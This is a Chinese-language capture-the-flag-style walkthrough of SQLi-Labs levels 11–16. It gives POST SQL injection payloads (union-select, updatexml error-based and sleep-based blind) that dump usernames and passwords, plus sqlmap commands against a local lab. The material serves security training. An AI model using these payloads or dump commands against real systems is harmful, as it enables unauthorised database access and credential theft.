专栏首页HACKWAYSqlilabs通关笔记(三)

Sqlilabs通关笔记(三)

第十一关 基于错误的POST单引号字符型注入

已经显示输入框了,说明是POST提交方式的注入

注入点判断

  1. 在输入框中输入单引号报错,说明为简单的字符型注入
  2. 根据之前GET闯关注入的经验,只是换成post提交
  3. 查看字段数,判断为2个字段

uname=admin' order by 2#&passwd=&submit=Submit 正常 uname=admin' order by 3#&passwd=&submit=Submit 不正常

  1. 直接上payload

payload直接查出数据库所有数据

uname=-admin' union select group_concat(username,password),2 from users#&passwd=&submit=Submit

第十二关 基于错误的POST双引号字符型注入

  1. 这关与上一关不同在于需要通过双引号来进行闭合,payload类似

uname=-admin") union select group_concat(username,password),2 from users#&passwd=&submit=Submit

第十三关 基于POST单引号双注入变形

  1. 通过输入反斜杠报错,可以通过')来进行闭合
  2. 猜测是报错注入,唯一不同的post传入
  3. 直接上payload,可以直接导出所有数据

uname=') and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))#&passwd=&submit=Submit

第十四关 基于POST双引号双注入变形

  1. 与十三关类似,只是需要通过双引号进行闭合
  2. 直接上payload

uname=" and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))#&passwd=&submit=Submit

第十五关 基于POST单引号布尔型时间盲注

  1. 使用了\ ’ 等各种姿势网页硬是没有变化
  2. 可能是时间盲注
  3. 直接用uname=admin' and sleep(10)#&passwd=1&submit=Submit 发现确是时间盲注
  4. 直接上sqlmap 或者 写个脚本跑就够了和之前GET时间盲注类似

第十六关 基于POST双引号布尔型时间盲注

  1. 和十五关类似,只是用双引号闭合

uname=admin") and sleep(10)#&passwd=1&submit=Submit

SQLMAP注入

  1. 通过burpsuit抓取数据包导入进sqlmap进行注入检测
  2. 以less11为例通过bp抓取数据包
  1. 选择导出文件为1.txt

如果要指定参数注入检测可以将该参数修改成*

  1. 使用sqlmap载入导出的数据包并进行注入检测

sqlmap -r "1.txt" -p uname -D security -T users -C username,password --dump --technique ES --batch --threads 10

  1. 也可以使用--data传入post参数

sqlmap -u "http://127.0.0.1/sqlilabs2/Less-15/" -data "uname=admin&passwd=admin&submit=Submit" --b atch --threads 10 --technique T --dbs

  • -r 读取抓包文件
  • -p 需要检测的参数
  • --technique 需要检测的注入方式
    • E 基于报错的注入
    • S 通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入
  • --batch 默认选择
  • --threads 线程数
  • -data 传入post参数(免去抓包)

本文分享自微信公众号 - HACKWAY(gh_7a5a315cde00),作者:HACKWAY

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-02-28

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • SQL注入靶场之SQLiLabs搭建指南

    据统计,互联网上SQL注入漏洞占整体的百分之六十左右,所以学好SQL注入的漏洞挖掘将十分重要。

    轩辕小子
  • Recon-ng被动信息收集框架入门

    在web渗透测试中,信息侦察与收集相当重要,每个经验丰富的黑客都有自己独特的信息收集妙招,信息搜集是渗透的第一步,也是至关重要的一步,信息的多少决定攻击的范围有...

    轩辕小子
  • 你要的干货!信息收集之绕过CDN获取真实网站IP方法总结

    CDN的全称是 Content Delivery Network,即内容分发网络,基本思路就是通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智...

    轩辕小子
  • 愚人节学术特辑:MIT教授宣布解决P=NP难题;宣扬暴力主义的GANs目前已被GUNs取代

    indianexpress AI科技评论按:今天是愚人节,然而学术圈并不平静, 比西方记者跑得都快的AI科技评论编辑整理了今日的一本正经胡说八道 的学术热点,一...

    AI科技评论
  • 大会 | CCF-GAIR 2018智能安全专场将有哪些大咖现身?内幕走一波

    第三届全球人工智能与机器人峰会(CCF-GAIR)将于6月29日至7月1日在深圳举办。

    AI科技评论
  • App开放接口api安全:Token签名sign的设计与实现

    在app开放接口api的设计中,避免不了的就是安全性问题,因为大多数接口涉及到用户的个人信息以及一些敏感的数据,所以对这些 接口需要进行身份的认证,那么这就需要...

    肉眼品世界
  • 谈谈游戏数据分析的那点事

    因为我实习的工作是游戏后端开发,所以难免会遇到游戏领域的一些专业知识,就比如游戏数据分析。因为之前从未接触过游戏这一块,所以很多东西得去学,在之前老大给我一个任...

    beifengtz
  • CSS同级别选择器样式覆盖机制

    雪糕的晴天
  • Dotcpp编程支持Python和php啦

    好久没有和大家交流,Dotcpp的小伙伴们中正在憋一些大招,憋了这么久先放几个出来

    编程范 源代码公司
  • OKCoin国际站接入Epay支付 美金提现手续费立享5折优惠

    新闻源:http://www.epay.com/cn/c/okcoin_join_hands_with_epay_fully_open_usd_deposit_...

    用户1655496

扫码关注云+社区

领取腾讯云代金券